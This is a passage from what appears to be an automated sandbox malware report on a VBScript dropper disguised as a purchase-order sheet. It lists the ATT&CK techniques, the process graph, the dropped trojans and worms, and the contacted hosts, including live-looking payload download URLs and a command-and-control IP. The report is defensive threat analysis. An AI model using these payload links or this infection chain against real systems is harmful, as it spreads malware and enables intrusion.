                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C991DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,13_2_00C991DC
                            Source: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exeCode function: 13_2_00C996E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,13_2_00C996E2
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B191DC socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,32_2_00B191DC
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 32_2_00B196E2 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,32_2_00B196E2

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information631
                            Scripting                            		2
                            Valid Accounts                            		11
                            Windows Management Instrumentation                            		631
                            Scripting                            		1
                            Exploitation for Privilege Escalation                            		1
                            Disable or Modify Tools                            		21
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		4
                            Ingress Tool Transfer                            		Exfiltration Over Other Network Medium1
                            System Shutdown/Reboot
                            CredentialsDomains1
                            Replication Through Removable Media                            		2
                            Native API                            		1
                            DLL Side-Loading                            		1
                            DLL Side-Loading                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory1
                            Peripheral Device Discovery                            		Remote Desktop Protocol21
                            Input Capture                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            Exploitation for Client Execution                            		2
                            Valid Accounts                            		1
                            Extra Window Memory Injection                            		3
                            Obfuscated Files or Information                            		Security Account Manager1
                            Account Discovery                            		SMB/Windows Admin Shares3
                            Clipboard Data                            		3
                            Non-Application Layer Protocol                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal Accounts1
                            Scheduled Task/Job                            		1
                            Scheduled Task/Job                            		2
                            Valid Accounts                            		1
                            DLL Side-Loading                            		NTDS4
                            File and Directory Discovery                            		Distributed Component Object ModelInput Capture314
                            Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchd221
                            Registry Run Keys / Startup Folder                            		21
                            Access Token Manipulation                            		1
                            Extra Window Memory Injection                            		LSA Secrets28
                            System Information Discovery                            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts112
                            Process Injection                            		12
                            Masquerading                            		Cached Domain Credentials1
                            Query Registry                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                            Scheduled Task/Job                            		2
                            Valid Accounts                            		DCSync261
                            Security Software Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job221
                            Registry Run Keys / Startup Folder                            		131
                            Virtualization/Sandbox Evasion                            		Proc Filesystem131
                            Virtualization/Sandbox Evasion                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                            Access Token Manipulation                            		/etc/passwd and /etc/shadow3
                            Process Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron112
                            Process Injection                            		Network Sniffing11
                            Application Window Discovery                            		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                            System Owner/User Discovery                            		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582355 Sample: Open Purchase Order Summary... Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 69 freedns.afraid.org 2->69 71 xred.mooo.com 2->71 73 5 other IPs or domains 2->73 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Antivirus detection for URL or domain 2->89 93 20 other signatures 2->93 10 wscript.exe 15 2->10         started        15 TCPKPY.exe 2->15         started        17 Synaptics.exe 2->17         started        19 10 other processes 2->19 signatures3 91 Uses dynamic DNS services 69->91 process4 dnsIp5 75 filedn.com 23.109.93.100, 443, 49705 SERVERS-COMUS Netherlands 10->75 55 C:\Users\user\AppData\Roaming\...behaviorgraphoogle.exe, PE32 10->55 dropped 57 C:\Users\user\AppData\...\Machine-PO[1].exe, PE32 10->57 dropped 101 System process connects to network (likely due to code injection or exploit) 10->101 103 Benign windows process drops PE files 10->103 105 VBScript performs obfuscated calls to suspicious functions 10->105 115 2 other signatures 10->115 21 Google.exe 1 5 10->21         started        107 Antivirus detection for dropped file 15->107 109 Multi AV Scanner detection for dropped file 15->109 111 Machine Learning detection for dropped file 15->111 113 Found API chain indicative of sandbox detection 15->113 59 C:\Users\user\Documents\LSBIHQFDVT\~$cache1, PE32 17->59 dropped 25 WerFault.exe 17->25         started        61 C:\Users\user\AppData\...\._cache_Google.exe, PE32 19->61 dropped 27 ._cache_Google.exe 19->27         started        file6 signatures7 process8 file9 49 C:\Users\user\AppData\...\._cache_Google.exe, PE32 21->49 dropped 51 C:\ProgramData\Synaptics\Synaptics.exe, PE32 21->51 dropped 53 C:\ProgramData\Synaptics\RCX4FAD.tmp, PE32 21->53 dropped 99 Creates multiple autostart registry keys 21->99 29 ._cache_Google.exe 2 5 21->29         started        34 Synaptics.exe 27 21->34         started        signatures10 process11 dnsIp12 77 172.111.138.100, 49720, 49747, 49753 VOXILITYGB United States 29->77 63 C:\Users\user\AppData\Roaming\...\TCPKPY.exe, PE32 29->63 dropped 65 C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, ASCII 29->65 dropped 117 Antivirus detection for dropped file 29->117 119 Multi AV Scanner detection for dropped file 29->119 121 Machine Learning detection for dropped file 29->121 123 Creates multiple autostart registry keys 29->123 36 cmd.exe 1 29->36         started        39 wscript.exe 29->39         started        79 drive.usercontent.google.com 142.250.185.161, 443, 49724, 49725 GOOGLEUS United States 34->79 81 docs.google.com 142.250.185.78, 443, 49714, 49715 GOOGLEUS United States 34->81 83 freedns.afraid.org 69.42.215.252, 49718, 49755, 80 AWKNET-LLCUS United States 34->83 67 C:\Users\user\Documents\IPKGELNTQY\~$cache1, PE32 34->67 dropped 125 Drops PE files to the document folder of the user 34->125 41 WerFault.exe 34->41         started        43 WerFault.exe 34->43         started        file13 signatures14 process15 signatures16 95 Uses schtasks.exe or at.exe to add and modify task schedules 36->95 45 conhost.exe 36->45         started        47 schtasks.exe 36->47         started        97 Windows Scripting host queries suspicious COM object (likely to drop second stage) 39->97 process17

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            Open Purchase Order Summary Sheet.vbs39%VirustotalBrowse
                            Open Purchase Order Summary Sheet.vbs26%ReversingLabsWin32.Trojan.Valyria

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\Documents\LSBIHQFDVT\~$cache1100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\Documents\LSBIHQFDVT\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                            C:\ProgramData\Synaptics\Synaptics.exe100%AviraTR/Dldr.Agent.SH
                            C:\ProgramData\Synaptics\Synaptics.exe100%AviraHEUR/AGEN.1353217
                            C:\ProgramData\Synaptics\Synaptics.exe100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Local\Temp\UAINOJ.vbs100%AviraVBS/Runner.VPJI
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe100%AviraHEUR/AGEN.1353217
                            C:\ProgramData\Synaptics\RCX4FAD.tmp100%AviraTR/Dldr.Agent.SH
                            C:\ProgramData\Synaptics\RCX4FAD.tmp100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\Documents\IPKGELNTQY\~$cache1100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\Documents\IPKGELNTQY\~$cache1100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%AviraTR/Dldr.Agent.SH
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%AviraW2000M/Dldr.Agent.17651006
                            C:\Users\user\AppData\Local\Temp\._cache_Google.exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe100%AviraHEUR/AGEN.1353217
                            C:\Users\user\Documents\LSBIHQFDVT\~$cache1100%Joe Sandbox ML
                            C:\ProgramData\Synaptics\Synaptics.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe100%Joe Sandbox ML
                            C:\ProgramData\Synaptics\RCX4FAD.tmp100%Joe Sandbox ML
                            C:\Users\user\Documents\IPKGELNTQY\~$cache1100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\._cache_Google.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe100%Joe Sandbox ML
                            C:\ProgramData\Synaptics\RCX4FAD.tmp92%ReversingLabsWin32.Worm.Zorex
                            C:\ProgramData\Synaptics\Synaptics.exe92%ReversingLabsWin32.Trojan.Synaptics
                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Machine-PO[1].exe92%ReversingLabsWin32.Trojan.Synaptics
                            C:\Users\user\AppData\Local\Temp\._cache_Google.exe61%ReversingLabsWin32.Trojan.Lisk
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe61%ReversingLabsWin32.Trojan.Lisk
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe92%ReversingLabsWin32.Trojan.Synaptics
                            C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe61%ReversingLabsWin32.Trojan.Lisk
                            C:\Users\user\Documents\IPKGELNTQY\~$cache192%ReversingLabsWin32.Worm.Zorex
                            C:\Users\user\Documents\LSBIHQFDVT\~$cache192%ReversingLabsWin32.Worm.Zorex

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://xred.site50.net/syn/SSLLibrary.dl100%Avira URL Cloudmalware
                            https://drive.usercontenI0%Avira URL Cloudsafe
                            https://docs.goou00%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            freedns.afraid.org
                            		69.42.215.252
                            		truefalse
                              		high
                              docs.google.com
                              		142.250.185.78
                              		truefalse
                                		high
                                s-part-0017.t-0009.t-msedge.net
                                		13.107.246.45
                                		truefalse
                                  		high
                                  drive.usercontent.google.com
                                  		142.250.185.161
                                  		truefalse
                                    		high
                                    filedn.com
                                    		23.109.93.100
                                    		truefalse
                                      		high
                                      xred.mooo.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        xred.mooo.comfalse
                                          		high
                                          http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978false
                                            		high
                                            https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exefalse
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978BCSynaptics.exe, 00000007.00000002.1736596805.000000000057A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://xred.site50.net/syn/Synaptics.rarZSynaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ip-score.com/checkip/5._cache_Google.exe, 00000004.00000002.2731173530.0000000004188000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://docs.google.com/google.com/MicrosoftSynaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://docs.google.com/uc?id=0B8Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/uc?id=0BSynaptics.exe, 0000001A.00000002.2248767553.000000000708C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1884018125.000000000708A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/userSynaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/google.com/CouldSynaptics.exe, 0000001A.00000002.2241567146.0000000004C65000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978XSynaptics.exe, 00000007.00000002.1745653784.00000000053F0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://docs.google.com/Synaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000003.1883469824.0000000004CB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978rxb$eSynaptics.exe, 0000001A.00000002.2232844486.0000000000722000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xred.site50.net/syn/SSLLibrary.dlGoogle.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGSynaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exeDwscript.exe, 00000000.00000003.1491439603.000001C7E28BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495274061.000001C7E28D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1491533263.000001C7E28D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://xred.site50.net/syn/SUpdate.iniZSynaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://xred.site50.net/syn/SUpdate.iniGoogle.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://drive.usercontenISynaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://docs.google.com/0(Synaptics.exe, 00000007.00000003.1631073537.000000000548F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://drive.usercontent.google.com/tSynaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://drive.usercontent.google.com/fife.google.Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.goou0Synaptics.exe, 0000001A.00000002.2287110513.000000000EF3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://docs.google.com/pKtSynaptics.exe, 00000007.00000003.1631073537.000000000548F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVSynaptics.exe, 0000001A.00000002.2297859060.000000000F089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://docs.google.com/5Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://docs.google.com/0Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://drive.usercontent.google.com/Synaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000007.00000003.1630718381.00000000005E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2241567146.0000000004C20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2295450672.000000000EFE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe22658-3693405117-2476756634-1003owscript.exe, 00000000.00000002.1495561900.000001C7E50B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1492572739.000001C7E50B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://xred.site50.net/syn/Synaptics.rarGoogle.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exe(wscript.exe, 00000000.00000003.1491439603.000001C7E28BE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495274061.000001C7E28D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1491533263.000001C7E28D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://docs.google.com/uc?id=0BxsMXGfPISynaptics.exe, 0000001A.00000003.1885148157.0000000004CD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://xred.site50.net/syn/SSLLibrary.dll6Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://filedn.com/wscript.exe, 00000000.00000002.1495490799.000001C7E50B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1Google.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docs.google.com/PSynaptics.exe, 00000007.00000003.1631073537.000000000548F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://docs.google.com/NSynaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://filedn.com/lp8FEqN2c8WurlGY9Azex17/Machine-PO.exej8/wscript.exe, 00000000.00000003.1491592783.000001C7E2850000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1495123949.000001C7E2852000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://docs.google.com/ent.sandbox.google.comSynaptics.exe, 00000007.00000002.1736596805.00000000005E2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://docs.google.com/uc?id=0;Synaptics.exe, 00000007.00000002.1740188857.0000000004C5E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2335565313.000000001A8FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2276373803.000000000D4BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2320961601.00000000157BE000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://crl.vwscript.exe, 00000000.00000002.1495561900.000001C7E50D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=HGoogle.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://xred.site50.net/syn/SSLLibrary.dllGoogle.exe, 00000003.00000000.1490965770.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, 00000007.00000002.1738663182.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001A.00000002.2239197903.0000000002140000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dlGoogle.exe, 00000003.00000003.1511255145.00000000022E0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      		high

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      142.250.185.78
                                                                                                                                      		docs.google.comUnited States
                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                      172.111.138.100
                                                                                                                                      		unknownUnited States
                                                                                                                                      		3223VOXILITYGBtrue
                                                                                                                                      69.42.215.252
                                                                                                                                      		freedns.afraid.orgUnited States
                                                                                                                                      		17048AWKNET-LLCUSfalse
                                                                                                                                      142.250.185.161
                                                                                                                                      		drive.usercontent.google.comUnited States
                                                                                                                                      		15169GOOGLEUSfalse
                                                                                                                                      23.109.93.100
                                                                                                                                      		filedn.comNetherlands
                                                                                                                                      		7979SERVERS-COMUSfalse

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                      Analysis ID:1582355
                                                                                                                                      Start date and time:2024-12-30 11:47:39 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 11m 28s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:38
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:1
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:Open Purchase Order Summary Sheet.vbs
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.adwa.expl.evad.winVBS@30/79@12/5
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 75%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                      • Number of executed functions: 90
                                                                                                                                      • Number of non-executed functions: 275
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .vbs

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, sppsvc.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.76.240, 184.28.90.27, 52.113.194.132, 20.42.65.84, 52.168.117.173, 20.189.173.17, 20.42.73.29, 4.175.87.197, 40.126.32.136, 13.107.246.45
